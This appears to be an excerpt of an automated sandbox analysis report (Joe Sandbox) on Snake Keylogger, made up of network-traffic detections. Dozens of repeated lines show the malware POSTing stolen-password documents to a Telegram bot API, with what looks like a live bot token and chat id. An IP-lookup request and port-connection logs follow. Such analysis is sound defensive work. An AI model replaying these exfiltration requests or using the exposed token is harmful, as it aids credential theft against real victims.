Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f5f1944bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f60e30cfHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6260960Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f63ddf5aHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f65a7c41Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6725283Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f68a2bcbHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6a6c7a7Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6be9e54Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6d67670Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f6f3139cHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f70ae976Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7193963Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7310ec4Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7500d3dHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f765838fHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f77d5a04Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f79531e4Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f7aaa6feHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc8e57daHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f9c112f6Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f9ebfc06Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa063563Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa1e0cdaHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa35e4b2Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa67f5d6Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fa9c6a51Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fab6a4feHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fad0deecHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255faefdd62Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb0a16dcHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb21ed31Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb3e8a7bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb5b2567Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb77c217Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fb8f9955Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbac356bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbc66f63Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbe30b62Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fbffa78bHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc19e195Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc367db4Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc50b76fHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc6d5398Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc852b9aHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fca1c74eHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fcbe6377Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fcdb0035Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd012540Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd24e880Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd4b0f70Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd654c02Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd86a900Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fda345bfHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fdc4a9cfHost: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fde869e7Host: api.telegram.orgContent-Length: 407
Source: global traffic	HTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fe135406Host: api.telegram.orgContent-Length: 407

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: unknown

HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49774 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
